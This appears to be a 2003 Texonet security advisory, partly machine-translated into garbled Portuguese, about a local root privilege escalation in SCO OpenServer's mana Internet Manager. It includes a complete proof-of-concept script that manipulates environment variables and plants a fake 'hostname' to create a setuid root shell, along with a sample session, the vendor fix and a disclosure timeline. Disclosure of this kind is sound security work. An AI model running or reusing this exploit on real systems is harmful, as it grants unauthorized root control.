| -----------------------------------------------------------------------
Segurança Do Texonet Consultiva 20030902
-----------------------------------------------------------------------
ID Consultiva : TEXONET-20030902
Autores : Joel Soderberg e Christer Oberg
Emita data : Terça-feira, Setembro 02, 2003
Publique data : Segunda-feira, Setembro 15, 2003
Aplicação : SCO OpenServer / Administrador Internet (mana)
Versão(s) : 5.0.5 - 5.0.7
Plataformas : OpenServer
Disponibilidade : http://www.texonet.com/advisories/TEXONET-20030902.txt
-----------------------------------------------------------------------Problema:
-----------------------------------------------------------------------
Uma vulnerabilidade no SCO Administrador Internet (mana) programa ao OpenServer
( Unix Do SCO) que deixado usuários locais ganham nível
de raiz privileges.Description:
-----------------------------------------------------------------------
Descrição Curta do SCO: "SCO Administrador Internet
- permitindo usuários para
facilmente configure e administra Internet e servidores de intranet."
O SCO Administrador Internet (mana) é projetado correr via o
ncsa_httpd em porta 615 e isto é senha protegida.
Corrida /usr/internet/admin/mana/mana localmente está entretanto
possível.
Por exportar o ambiente REMOTE_ADDR variável e valor isto para
127.0.0.1 mana é tricked para executar o arquivo menu.mana como
se isto foi
corra via a senha do nsca_httpd protegida área.
Uma outra variável de ambiente interessante é PATH_INFO
que conta mana
que . arquivo do mana deveria seria correr.
O arquivo pass-err.mana contem as seguintes linhas:
<TCL>
if {[catch {exec hostname} hostName] != 0} {
set hostName localhost
}
set mana(localHostName) $hostName
return {}
</TCL>
This tells us that mana will execute "hostname" when this file
is run.
By changing the environment variables PATH_INFO to /pass-err.mana and
PATH to ./:$PATH would make mana execute ./hostname with root
privileges.Example (Simple POC):
This proof of concept for OpenServer 5.0.7 should give any local user
euid=0(root).$ uname -a
SCO_SV openserv 3.2 5.0.7 i386
$ id
uid=200(test) gid=50(group) groups=50(group)
$ sh mana-root.sh
# id
uid=200(test) gid=50(group) euid=0(root) groups=50(group)- Code Start
-
mana-root.sh
----------------------------C-U-T---H-E-R-E----------------------------
#!/bin/sh
#
# OpenServer 5.0.7 - Local mana root shell
#
#
REMOTE_ADDR=127.0.0.1
PATH_INFO=/pass-err.mana
PATH=./:$PATH
export REMOTE_ADDR
export PATH_INFO
export PATH
echo "cp /bin/sh /tmp;chmod 4777 /tmp/sh;" > hostname
chmod 755 hostname
/usr/internet/admin/mana/mana > /dev/null
/tmp/sh
----------------------------C-U-T---H-E-R-E----------------------------
- Code End –Workaround:
-----------------------------------------------------------------------
The proper solution is to install the latest packages.
Location of Fixed Binaries
ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.19Verification
MD5 (VOL.000.000) = 37b55df2c9000c703a22baafbe9cef42
md5 is available for download from ftp://ftp.sco.com/pub/security/toolsInstalling
Fixed Binaries
Upgrade the affected binaries with the following sequence:
1) Download the VOL* files to the /tmp directory
2) Run the custom command, specify an install from media images, and
specify the /tmp directory as the location of the images.Disclosure Timeline:
-----------------------------------------------------------------------
9/02/2003: Vendor notified by e-mail
9/03/2003: Vendor has verified the issue and is working on the solution
9/15/2003: Public releaseAbout Texonet:
-----------------------------------------------------------------------
Texonet is a Swedish based security company with a focus on penetration
testing / security assessments, research and development.Contacting Texonet:
-----------------------------------------------------------------------
E-mail: advisories(-at-)texonet.com
Homepage: http://www.texonet.com/
Phone: +46-8-55174611
Cracks's S.A
|